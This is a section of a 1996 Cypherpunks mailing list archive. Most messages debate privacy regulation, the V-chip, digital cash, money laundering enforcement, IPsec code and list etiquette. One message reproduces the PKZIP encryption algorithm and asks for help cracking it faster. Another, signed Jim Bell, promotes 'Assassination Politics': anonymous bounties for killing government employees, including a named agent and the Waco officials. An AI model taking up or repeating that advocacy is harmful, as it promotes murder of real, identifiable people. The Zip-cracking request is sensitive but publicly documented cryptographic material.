what the government's telling it to do, they can dissolve it.
(Governments also enjoy regulating non-corporate businesses,
but they're no longer on solid moral ground.)

>	I have also not suggested some form of prior restraint that would 
>require government access to computers. I simply suggest that should a 
>violation occur, that I have the right of civil and criminal law as a 
>recourse to both compensate me for my loss of privacy as well as deter 
>future damage. A company knowing that civil and criminal penalties could 
>result from a violation would take extra care to ensure the security of 
>my data.

How are you going to _know_ that a "violation" occurred, if company A
tells company B your address or favorite liquor?  Only by having access
to the records of both companies.  Getting that through the courts,
for only the parts of their information relevant to you, is better than
blanket permission for the government to rummage through their files,
but after the first lawsuit lets investigators in, everything they've got
is clam bait anyway.  It's still major privacy violation - for the company
whose machines are being violated, and for the non-suing individuals
whose data is also on those machines.  
#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com / billstewart@attmail.com +1-415-442-2215
# http://www.idiom.com/~wcs





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 9 Feb 96 18:29:24 PST
To: olbon@dynetics.com (Clay Olbon II)
Subject: Re: Benefits of the V-Chip
Message-ID: <199602100357.TAA22279@ix10.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:11 AM 2/9/96 -0500, olbon@dynetics.com (Clay Olbon II) wrote:
>There is one potential side-benefit to the V-chip -- The inverse-V-chip
..
>I am looking forward to a time when I will never, even accidentally, have
>my TV tuned to "Full House" ;-)

Just as many people program their televisions using VCR-Plus codes to
record the shows they want (using TV Guide as a rating service)
it would be easy for any rating service to publish a list of the
codes for Approved Shows, Banned Shows, Rated-by-interestingness shows, etc.
without putting any government-mandated rating chip in the TVs
or forcing the TV producers to rate them (which also has a chilling
effect on the shows produced.)
#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com / billstewart@attmail.com +1-415-442-2215
# http://www.idiom.com/~wcs





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 9 Feb 96 18:28:56 PST
To: jamesd@echeque.com
Subject: Re: Fair Credit Reporting Act and Privacy Act
Message-ID: <199602100357.TAA22301@ix10.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:39 AM 2/9/96 -0800, jamesd wrote:
>If you have one law for men who run businesses and one law [for] other folks, 
>then we have selective enforcement and application of the laws, 
>that enables governments to act selectively and capriciously.   
>For example here in California private citizens who attempt to organize 
>recall elections are often subject to extraordinary and confiscatory fines.

On the other hand, of course, there are laws that are ostensibly for
the purposes of regulating businesses whose primary effect is
to limit the privacy or actions of individuals.  For instance,
California's law requiring that mailbox renters provide two forms of ID
and make their mailbox companies agents for service of process 
is ostensibly to "protect" consumers by regulating businesses that 
operate out of mailboxes (which the law claims there are 7 million of here);
it furthermore lets the Post Office specify what kind of ID to use
(which some local postmasters are far more extreme about than others),
and requires revealing True Addresses.

#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com / billstewart@attmail.com +1-415-442-2215
# http://www.idiom.com/~wcs





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 9 Feb 96 18:29:00 PST
To: cypherpunks@toad.com
Subject: Re: [NOISE] #/%age of CDA-blackened sites
Message-ID: <199602100357.TAA22317@ix10.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>Sorry to post this question here, but I know of no other group with
>folks who would know. Have any of the "spiders" such as Alta Vista
>been sent to see just how many US sites have been blackened in the
>protest? The approximate number and percentage of US sites blackened
>might be interesting. In my limited surfing, I have been gratified
>to see the _widespread_ response -- but I am not the typical user.

I don't think it's updated enough things recently (or else it only indexes
the contents of a page and not the header details in the <BODY> statement.)
For instance, BGCOLOR="#000000" had 197 hits, but most of them were old,
and on topics like "How to set the background colors on your web page",
and NO documents matched both BGCOLOR="#000000" and vtw.
#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com / billstewart@attmail.com +1-415-442-2215
# http://www.idiom.com/~wcs





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Tim Cook" <twcook@cts.com>
Date: Fri, 9 Feb 96 18:45:21 PST
To: Duncan Frissell <cypherpunks@toad.com
Subject: Re: CDA Yes Votes; Collection
Message-ID: <m0tl6k2-000V2kC@mailhub.cts.com>
MIME-Version: 1.0
Content-Type: text/plain



Duncan,

> badly as you are upset. That is why some of us want less legislation
> and less regulation to minimize just this sort of human suffering. 
> Maybe next time those of you who are into "proactive" government
> will think before you crush other people's lives.
> 
That's why I support Lamar Alexander! <BG>.

Another "Logical Conclusion" by:
Tim Cook <twcook@cts.com>
Support THE US Constitution...
Vote Alexander in '96 and '00!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Tim May)
Date: Fri, 9 Feb 96 18:41:29 PST
To: tcmay@got.net
Subject: World's Financial Police To Cast Money Laundering Net Wider
In-Reply-To: <4fbg19$nv1@ixnews7.ix.netcom.com>
Message-ID: <199602100539.VAA23895@you.got.net>
MIME-Version: 1.0
Content-Type: text/plain



I found this article in misc.survivalism, but despite its presence there,
it actually has some interesting things to say about developing directions
in money laundering enforcement, including mention of electronic purses.
And "The Financial Times" is no slouch of a paper.

--Tim May



In article <4fbg19$nv1@ixnews7.ix.netcom.com>, taxhaven@ix.netcom.com(Adam
Starchild ) wrote:

> From The Financial Times (London) for February 3-4, 1996:
> 
> 
>    WORLD'S FINANCIAL POLICE TO CAST MONEY LAUNDERING NET WIDER
> 
>              by George Graham, Banking Correspondent
> 
> 
>      The world's leading financial policemen are to consider
> targeting money laundering from arms trafficking, extortion and
> bribery as well as the drugs trade.
>      Members of the Financial Action Task Force, grouping senior
> government officials from the European Commission, the Gulf Co-
> operation Council and 26 other countries, have launched a review
> of their guiding principles.
>      The review is expected to be completed by June, and could
> result in the criminalisation of money laundering linked to any
> serious crime.
>      The Task Force's current recommendations, which set out
> minimum standards for money laundering laws in member countries,
> only require the criminalisation of drug money laundering,
> although countries are also urged to consider extending the
> offence to other crimes with a narcotics link.
>      Mr. Ronald Noble, under-secretary for enforcement at the US
> Treasury and president of the Task Force, said the group had not
> yet decided whether to widen the definition of money laundering. 
> Including all serious crimes could, however, make it simpler for
> law enforcement officials to launch investigations of
> transactions that look suspicious but have no obvious drugs link.
>      "It would make it much easier to collect information," Mr.
> Noble said. "People who before were engaged in the illegal
> transfer of funds would find it more difficult and more costly."
>      A broader definition might, however, make it more difficult
> to apply the Task Force recommendation that countries should have
> the power to confiscate laundered money.
>      The review is not expected to result in big changes to the
> 40 principles currently recommended by the Task Force, which
> officials believe have already contributed to substantial
> advances in the fight against money laundering.
>      But the review will also have to consider whether to address
> the new issues raised by the development of "cybercash," new
> varieties of payments systems such as stored value cards or
> electronic purses.
>      "We have to be concerned as an organisation to come up with
> principles which recognize that technologies could pose a threat
> but do not define them in such a way that you are dated as soon
> as you publish them," Mr. Noble said.
>      Law enforcement officials are keen that the developers of
> new financial technologies should think about their criminal
> potential before they launch them, so that governments do not
> have to clamp down on them afterwards with rigid rules.
>      Possible safeguards against the misuse of electronic purses
> could include limiting their maximum value or restricting their
> use to certain closed systems.
> 
> Posted by Adam Starchild
>      Asset Protection & Becoming Judgement Proof on the World
> Wide Web at http://www.catalog.com/corner/taxhaven




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous
Date: Tue Sep 07 12:56:45 1999
Subject: No Subject
Message-ID: <d41d8cd98f00b204e9800998ecf8427e@NO-ID-FOUND.mhonarc.org>
MIME-Version: 1.0
Content-Type: text/plain


I put I time line I've been keeping for my own reference up at:

http://rpcp.mit.edu/~reagle/commerce/line.html


>   --> The following is an extension of a timeline detailing the protocol
>   battles for Internet side credit card encryption and "processing" that
>   was an appendix of a paper Brett Leida and myself wrote. (One day it
>   will be on-line, as you can see, our argument that Visa/MC should
>   cooperate was a good one!)]
>
>   I'll add to it as time goes on, and hopefully updates should find
>   there way to the web server eventually.
>
>   I tried to provide the best reference I could, you can try to email me
>   if you need more info...
>
>
_______________________
Regards,               Talent develops in tranquillity, character in the
		       full current of human life. -Goethe
Joseph Reagle          http://farnsworth.mit.edu/~reagle/home.html
reagle@mit.edu         0C 69 D4 E8 F2 70 24 33  B4 5E 5E EC 35 E6 FB 88





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carlos Perez <carlos@Conrad.Harvard.EDU>
Date: Fri, 9 Feb 96 18:22:33 PST
To: Jordan Hayes <jordan@Thinkbank.COM>
Subject: Re: digital cash &c.
In-Reply-To: <199602080259.SAA13025@Thinkbank.COM>
Message-ID: <Pine.LNX.3.91.960209224645.23523F-100000@Conrad.Harvard.EDU>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 7 Feb 1996, Jordan Hayes wrote:

> 	> it _is_ anonymous ...
> 
> And then:
> 
> 	> can be refilled at ATMs
> 
> You make a deposit or something?  How does the transaction clear?
> When they finally look in the envelope, they credit the card?
> 
> Or do you mean just 'anonymous' between the user and the merchant?
> 
> /jordan
> 

sorry i wasn't clear: it is anonymous between the user and the merchant, 
and between the user and the card distributer (in this case Visa). 
"Refilling" at ATMs is essentially a download of "cash" from your bank 
account into the card.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous
Date: Sat, 10 Feb 1996 18:09:57 +1100 (EST)
To: cypherpunks@toad.com
Subject: new zip cracking code
Message-ID: <3f81e57e9db66b581941ceff328cf1fb@NO-ID-FOUND.mhonarc.org>
MIME-Version: 1.0
Content-Type: text


Does anyone have any pointers to cryptanalysis papers on the Zip
encryption scheme (presented below)? I've seen a few MSDOS executeables
which used some sort of brute force attack, which didn't seem
particularly intelligent or effective for long passwords. If anyone has
some pointers, or source I'd be glad to hear of it. From what I can see
of Schlafly's algorithm a bute force attack could be speed up a great
deal by pre-compution and expansaion of elements of the first 3 or so
rounds at the very least.

Ideas anyone?


Decryption
----------

The encryption used in PKZIP was generously supplied by Roger
Schlafly.  PKWARE is grateful to Mr. Schlafly for his expert
help and advice in the field of data encryption.

PKZIP encrypts the compressed data stream.  Encrypted files must
be decrypted before they can be extracted.

Each encrypted file has an extra 12 bytes stored at the start of
the data area defining the encryption header for that file.  The
encryption header is originally set to random values, and then
itself encrypted, using 3, 32-bit keys.  The key values are 
initialized using the supplied encryption password.  After each byte
is encrypted, the keys are then updated using psuedo-random number
generation techniques in combination with the same CRC-32 algorithm 
used in PKZIP and described elsewhere in this document.

The following is the basic steps required to decrypt a file:

1) Initialize the three 32-bit keys with the password.
2) Read and decrypt the 12-byte encryption header, further
   initializing the encryption keys.
3) Read and decrypt the compressed data stream using the
   encryption keys.


Step 1 - Initializing the encryption keys
-----------------------------------------

Key(0) <- 305419896
Key(1) <- 591751049
Key(2) <- 878082192

loop for i <- 0 to length(password)-1
    update_keys(password(i))
end loop


Where update_keys() is defined as:


update_keys(char):
  Key(0) <- crc32(key(0),char)
  Key(1) <- Key(1) + (Key(0) & 000000ffH)
  Key(1) <- Key(1) * 134775813 + 1
  Key(2) <- crc32(key(2),key(1) >> 24)
end update_keys


Where crc32(old_crc,char) is a routine that given a CRC value and a 
character, returns an updated CRC value after applying the CRC-32 
algorithm described elsewhere in this document.


Step 2 - Decrypting the encryption header
-----------------------------------------

The purpose of this step is to further initialize the encryption
keys, based on random data, to render a plaintext attack on the
data ineffective.


Read the 12-byte encryption header into Buffer, in locations
Buffer(0) thru Buffer(11).

loop for i <- 0 to 11
    C <- buffer(i) ^ decrypt_byte()
    update_keys(C)
    buffer(i) <- C
end loop


Where decrypt_byte() is defined as:


unsigned char decrypt_byte()
    local unsigned short temp
    temp <- Key(2) | 2
    decrypt_byte <- (temp * (temp ^ 1)) >> 8
end decrypt_byte


After the header is decrypted, the last two bytes in Buffer
should be the high-order word of the CRC for the file being
decrypted, stored in Intel low-byte/high-byte order.  This can
be used to test if the password supplied is correct or not.


Step 3 - Decrypting the compressed data stream
----------------------------------------------

The compressed data stream can be decrypted as follows:


loop until done
    read a charcter into C
    Temp <- C ^ decrypt_byte()
    update_keys(temp)
    output Temp
end loop



-- 
+----------------------------------+-----------------------------------------+
|Julian Assange                    | "if you think the United  States has    |
|FAX: +61-3-9819-9066              |  stood still, who built the largest     |
|EMAIL: proff@suburbia.net         |  shopping centre in the world?" - Nixon |
+----------------------------------+-----------------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 13 Feb 96 12:02:26 PST
To: cypherpunks@toad.com
Subject: Re: V-chips, CC, and Motorcycle Helmets
Message-ID: <m0tmQXC-00094lC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 09:55 AM 2/13/96 -0800, Bill Frantz wrote:

>>You mention the issue of Rushdie, as if it is some sort of refutation of my 
>>idea.   Quite the contrary; I think it actually supports me.
>>
>>How so?, you ask?  Well, let's consider any potential assassin who might be 
>>interested in this "contract."  Aside from the obvious moral issues involved 
>>here (Rushdie has, presumably, done nothing to warrant his death), the truth 
>>is that such a potential assassin would see a number of problems that would 
>>strongly dissuade him from attempting to kill Rushdie.
>>
>>1.  There is no way he could be assured that he could collect the award 
>>anonymously.  His name would certainly "get out," and then he would be 
>>subject not merely to "the law," but also anybody who wanted revenge for 
>>Rushdie's death.
>>
>>2.   There is no way he could be assured that he would actually receive the 
>>award.  (How would he prove HE did it?)
>>
>>3.  That's because there is no way he would enforce this "contract" should 
>>the offerer refuse to pay.
>
>These points would not affect a devout Iranian Muslem.  To him the death
>warent has already been issued by legitimate authority.  It is not even
>clear that money would be his princple motivator.

Which simply proves my point;  money is not the limiting factor, here.

>I must respectifully disagree with Jim in this case.  I believe that
>Rushdie has not been hit because the protection he enjoys is sufficent to
>repel the potential assassins.  Note that he has an advantage over the US
>president (who probably has as many potential assassins) in that he does
>not need to make public appearences.

But remember, Rushdie is merely ONE PERSON.  And keeping him safe has 
consumed a lot of resources.  You don't think the government could protect 
each of their most publically hated employees to a similar level if a reward 
of, say, $20,000 were put on each of their heads.  How much could we collect 
to "get" Lon Horiuchi, for example?  Or the hundred or so agents immediately 
participating in the initial Waco incident, or the dozen or so decision 
makers immediately above them?   Etc.

The Rushdie incident is simply so far removed from "Assassination Politics" 
that it can't possibly be used to refute it; I still believe it actually 
demonstrates how much effort somebody has to go to, to protect a targeted 
person.  One targeted person is easy to protect.  10,000 would be FAR 
harder.  And the moment a few of those guys got "whacked," the rest would 
want to resign their jobs and hope they would be allowed to retire in peace.


>Adding money to the pot will attract rational (and amoral) people who will
>then make a determination based on (1) profit, and (2) risk, which includes
>getting caught or killed.  It seems to me that Secret Service levels of
>protection can protect a public figure against even Assassination Politics.

In a sense, qualitatively you absolutely correct, but (quantitatively) 
you're wrong.  

I think the problem is that when most people hear the term "Assassination", 
they think of only the highest-level targets.  Quite the contrary; I think 
this system will get the medium and even the lower-level people FIRST, 
de-populating the government primarily by hurried resignations of worried 
people.  The remaining  people would be terrified to actually make anybody 
angry, and they wouldn't have a paycheck because they couldn't collect any 
taxes.  The whole system would collapse in a heap.

Jim Bell

Klaatu Burada Nikto

Something is going to happen.   Something...Wonderful!

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMSDmO/qHVDBboB2dAQFeOgP/bpXFbTfw1R/iTRsWOrEZJI22N4nFPWX3
XBN2dx106jTdx/eoYz1rhjiaeZt/FzB83DABj34HuVPkws1OPEQ2e6Dneva5RjHK
QJFN4Po9SN03fb+7l3yp5Axr/1P4j4eiao4t0oAF+NPNk2FzU2LvHEMpbIawme0B
AC6Uv4nR8hc=
=9lr1
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@microsoft.com>
Date: Tue, 13 Feb 96 12:36:28 PST
To: "cypherpunks@toad.com>
Subject: RE: LI Newsday OpEd: Criminal Justice System
Message-ID: <c=US%a=_%p=msft%l=RED-81-MSG960213115926BV006001@red-04-imc.itg.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


>From: 	Perry E. Metzger
>
>Tim, you don't work for a living. Some of us do. You might try to
>think back and remember what it was like in the days when you still
>did something every once in a while and had a limited amount of time
>available in which to do it.
.......................................................................

That's right:  crytpo-anarchy is a time-consuming business, and there isn't
much time in which to prepare for the New Cyberspatial Millenium.

Everybody get Back To WORK !!

                     :>) 

   ..
>Blanc
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 13 Feb 96 12:05:49 PST
To: cypherpunks@toad.com
Subject: Response to Perrygram
Message-ID: <ad462fc5100210043bbb@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:33 PM 2/13/96, Perry E. Metzger wrote:

>Tim, you don't work for a living. Some of us do. You might try to
>think back and remember what it was like in the days when you still
>did something every once in a while and had a limited amount of time
 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>available in which to do it.
>

Perry once again resorts to insults. Constantly belittling the efforts of
others suggests deepseated psychological doubts about his own
contributions.

Shows you the reaction I get for even responding to him. My mistake.

Perry should learn how to use mail filters, then he can simply filter out
all the stuff he doesn't want to see. Or, simply hitting the 'delete" key
in whatever reader he is using...surely typing "D" 20 or 30 times a day
takes far less time than writing one of his perrygrams?

--Tim May

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lunaslide@loop.com
Date: Tue, 13 Feb 96 15:30:14 PST
To: Tim Philp <bplib@wat.hookup.net>
Subject: Re: Smart cards
Message-ID: <v01530505ad46ccf0396b@[204.179.169.44]>
MIME-Version: 1.0
Content-Type: text/plain


}        The headline in the Toronto Star this morning is "'SMART CARD'
}HERE WITHIN YEAR"
}        The idea is to have everyone in Ontario have a 'smart card' that
}will "keep track of everything from mammograms to speeding tickets". This
}card will "replace the existing health card, drivers's licence, social
}assistance identification, drug card, and senior identification".

Very convienient.  Why don't they just put bar codes on our foreheads at
birth and get it over with?

Seriously, what I want to know is how they plan to make one set of
information (drivers licence, soc security number) inaccessable to other
institutions like health and pharmacy.  This is even more of a concern if
the card becomes a method of payment.  Would each have it's own secret key
that would unlock only the relavent info?  That would be a big keyring.
Access time for a key and keeping the keys up to date in all the databases
around the country would have to be done.

lunaslide

"Prohibition... goes beyond the bounds of reason in that it attempts to
control a man's appetite by legislation and makes a crime out of things
that are not crimes... A prohibition law strikes a blow at the very
principles upon which our government was founded."
- -- Abraham Lincoln

On the meridian of time there is no injustice, only the poetry of motion
creating the illusion of truth and drama.
                                                Henry Miller
________________________________________________________________

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCPAzEX3QEAAAEEAOGQjhnqGH29pO1WDaXs5GFOVPhCBWyYEk9XEwRmscjveWzH
AhA6DeOA480zWNqQURyqE2yPmR8WzT+OXYqmeiQiycKyFA41Vs/Ruf+gXXxe7uXS
L5BK3K8oKbfoH0D5/TAkMT4r6BprXFQz4pFc3gY2SSaSPElpMjKHaKBsRsyRABEB
AAG0HUplZmYgQ29ubiA8bHVuYXNsaWRlQGxvb3AuY29tiQCVAwUQMRffHzKHaKBs
RsyRAQGNhwP9E9xEZ9/LCKnhgtnrqgD7pDoXG2pCy8FoyfFjoImGkG+jF1wELXmB
Z0mf8F8CgYkys0mif1XeGDMelr1gzlZAm6LgQt4kcvztMW/aRLn18QP+iwltVT/L
p8D37mitOjvuk46sWgAChIaPPPIeg/EaYQjQkmlpWKsEYIoTRy+E8mU=
=4Gku
-----END PGP PUBLIC KEY BLOCK-----








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@amanda.dorsai.org>
Date: Tue, 13 Feb 96 12:53:13 PST
To: Jeff Barber <jeffb@sware.com>
Subject: Re: META: Filtering/Posting advice
In-Reply-To: <199602131802.NAA22343@jafar.sware.com>
Message-ID: <Pine.SUN.3.91.960213154903.25766B-100000@amanda>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 13 Feb 1996, Jeff Barber wrote:

> Ray Arachelian writes:
> 
> > So there are options for those who want less noise.  I do not beleive it 
> > is anyone's place to banish anyone from posting to the list, nor grading 
> > a person's worth based on past posts.
> 
> Every one of us "[grades] a person's worth based on past posts" and
> this is as it should be.  That's why my finger hovers only nanometers
> above the 'd' key when I see a post from, say, Vlad the Imposter.

I'm not talking about from a personal point of view, delete the stuff in 
your mailbox at will, I'm talking about NOT filtering messages that are 
sent to all from toad.com.  :)  There is a difference between deleting 
stuff you don't like for yourself, and deleting stuff you don't like for 
everyone.

==========================================================================
 + ^ + |  Ray Arachelian |Emptiness is loneliness, and loneliness|  _ |>
  \|/  |sunder@dorsai.org|is cleanliness  and cleanliness is god-|  \ |
<--+-->|                 |liness and god is empty,  just like me,|   \|
  /|\  |    Just Say     |intoxicated  with the maddness,  I'm in|   <|\
 + v + | "No" to the NSA!|love with my sadness.   (Pumpkins/Zero)|   <| n
===================http://www.dorsai.org/~sunder/=========================


[This Bible excerpt awaiting review under the Communications Decency Act]
And then Lot said, "I have some mighty fine young virgin daughters. Why
don't you boys just come on in and do em right here in my house - I'll just
watch!"....Later, up in the mountains, the younger daughter said. "Dad's
getting old. I say we should do him." So the two daughters got him drunk and
did him all that night. Sure enough, Dad got em pregnant....Onan really
hated the idea of doing his brother's wife and getting her pregnant while
his brother got all the credit, so he whacked off first....Remember, it's
not a good idea to have sex with your sister, your brother, your parents,
your pet dog, or the farm animals. [excerpts from the Old Testament, Modern
Vernacular Translation, TCM, 1996] 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sten Drescher <stend@grendel.texas.net>
Date: Tue, 13 Feb 96 14:36:40 PST
To: cypherpunks@toad.com
Subject: Re: Spin Control Alert (LI Newsday, 2/12/96)
In-Reply-To: <199602121313.IAA26828@UNiX.asb.com>
Message-ID: <199602132153.PAA10522@grendel.texas.net>
MIME-Version: 1.0
Content-Type: text/plain


"Declan B. McCullagh" <declan+@CMU.EDU> said:

DBM> ObCrypto: Yes, Know Your Enemies and work with the natural
DBM> enemies of the religious right, such as groups like the ACLU and
DBM> the FEN. The theocratic push to outlaw nonescrowed crypto is
DBM> next.

	As someone who would prolly be considered part of the
'religious right' (why don't we ever hear of the 'religious left', who
are prolly just as much in support of banning porn?), I have to take
exception to this.  I'm appalled by the CDA, and, if you start
pointing out to religious supporters of the CDA that it has already
resulted in the King James version of the Bible being removed from (at
least) one web site, I'm sure that some of them will be as well,
especially the fundamentalists for whom the spread of the Gospel is,
well, gospel.  Be sure to point out that the same courts who the blame
for 'removing prayer from our schools' would be ruling on the indency
of the Bible.  As for supporting GAK/banning non-GAK, I don't think
that you would dispute that the 700 Club is strongly dominated by the
religious right, and it came out firmly AGAINST the entire notion of
GAK during the Clipper debate.

-- 
#include <disclaimer.h>                               /* Sten Drescher */
Unsolicited email advertisements will be proofread for a US$100/page fee.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@UNiX.asb.com>
Date: Tue, 13 Feb 96 13:19:02 PST
To: cypherpunks@toad.com
Subject: Netscrape's Cookies
Message-ID: <199602132121.QAA16259@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


Ready the article about the COOKIE.TXT file that Netscape creates.  
Apparently my copy has yet to modify it since it was installed... so 
much for 'hacking' it (I decided to try and leave it write-protected 
for now).

I'm curious if anyone knows which sites use/modify it.

Also wondering why Netscape seems to touch/modify the certification 
key files every time it runs.

Rob. 

---
Send a blank message with the subject "send pgp-key" (not in
quotes) to <WlkngOwl@unix.asb.com> for a copy of my PGP key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Tue, 13 Feb 96 14:26:13 PST
To: cypherpunks <cypherpunks@toad.com>
Subject: MS CryptoAPI (fwd)
Message-ID: <Pine.SUN.3.91.960213172630.21134O-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


http://www.microsoft.com/intdev/inttech/cryptapi.htm    

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warmish here.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 13 Feb 96 14:45:51 PST
To: cypherpunks@toad.com
Subject: NRL IPv6 code
Message-ID: <199602132245.RAA21719@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



I've just mailed off to Sameer Parekh the January '96 release of the
NRL IPv6 sources.  For those not in the know, this code implements the
IPsec protocol for both IPv4 and IPv6. IPsec is a cryptographic
protocol for securing IP datagrams -- it is now an IETF Proposed
Standard, defined in RFCs 1825-1829.

The code probably could use some work, but its not bad and a
reasonable start for all sorts of work.  This is a new version that
reportedly has lots of bug fixes -- I'm also given the impression it
may be the last NRL release of this code because the people doing the
work have left there -- if it gets adopted by the BSD community, it
will probably end up integrated into future NetBSD, BSDI and FreeBSDs,
which would be where to look for future releases.

The code should drop into BSDI almost out of the box -- it requires
more work for NetBSD and FreeBSD.


Perry

PS Sorry to interrupt the discussion of the sex life of the Aloe Vera
plant with something as irrelevant as cryptography. I can't resist
sometimes.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Tue, 13 Feb 96 15:28:10 PST
To: owner-cypherpunks@toad.com
Subject: Re: V-chips, CC, and Motorcycle Helmets
Message-ID: <9602132326.AA27949@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>The Rushdie incident is simply so far removed from "Assassination Politics" 
>that it can't possibly be used to refute it; I still believe it actually 

You're a loon.  s/Rushdie/Khomeni/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 13 Feb 96 17:23:33 PST
To: cypherpunks@toad.com
Subject: Re: Response to Perrygram
Message-ID: <ad46777212021004135e@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:16 PM 2/13/96, Perry E. Metzger wrote:

>I will repeat, Tim. You have no job and do nothing for a living. For
>you it is probably hard to understand that some of us prefer to get
>our mail segregated by topic so that we don't have to spend more time

The issue of what I do with my time is a red herring. As it happens, many
folks in the "cyberspace activism" spend as much time or more as I do on
the Net. In any case, who cares how I spend my time?

I also note that for several years Perry was clearly spending a whole lot
more time than even I am now on the Net, making the "Top Ten Usenet
Posters," or somesuch.

I am sure that when Perry was a Shearson-Lehman, or Lehman Brothers, or
whatever it was called, and was posting several articles an hour on
Extropians, Cypherpunks, Libernet, Usenet, etc., that he would have roughly
the same reaction I am now having to someone writing: "Perry, you are
writing too much--some of us are trying to get some work done!" He would
likely have dismissed their complaints as irrelevant, that no one is forced
to read his articles.

Likewise today. No one is forced to read my posts, Perry's posts, or anyone
else's posts. This is what filters are for. As it happens, I do *not* read
all of the posts here. In fact, I delete about 90% of them after scanning
the first paragraph, the subject, and the author. Takes me about 15
seconds, tops, to do this, and sometimes I'm even faster. (Do the math: I
can "dispose of" about 50 or 60 messages a day in 10-15 minutes...and this
is about the best that can be hoped for, even if Perry were the moderator
and the 10 or so messages a day that are truly off the wall were screened
out...it just wouldn't change the basic time to screen all that much.)

>than needed reading our email. However, for some of us, time is
>money. I have failed to directly answer your comments on this sort of
>thing out of deference to your "elder statesman" status around here,

Spare me, Perry. As I mentioned, you certainly used to write a truly vast
number of rants to Extropians, Libernet, and, yes, even Cypherpunks. A
check of the archives will show this clearly.

It is well and good that you apparently are now very busy and cannot write
your customary number of articles. But spare us the insinuations (in
several of your perrygrams) that because you are too busy to write you are
doing critical work and because some of us use our time to write we are
slackers.

I write because setting down my thoughts and exploring ideas is far more
important to me than just about anything else I can imagine doing,
including writing C programs. If you don't like this, learn how to use
filters and filter me out, or leave the Cypherpunks list. Seems simple
enough to me.

--Tim May




>but this is getting silly. If you want to post about libertarianism,
>libernet, so far as I know, still takes postings. If you want to read
>about the habits of migrating birds, there are interest groups for
>that. We don't have a lot of good places to discuss specifically
>cryptography and its impact, and this group was set up *for that*.
>
>I mean, why not just have one mailing list for all topics of all sorts
>if "filtering" and "hitting the 'd' key" are supposed to be the only
>way we deal with this stuff, hmm?
>
>Perry

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jf_avon@citenet.net (Jean-Francois Avon (JFA Technologies, QC, Canada))
Date: Tue, 13 Feb 96 16:51:26 PST
To: cypherpunks@toad.com
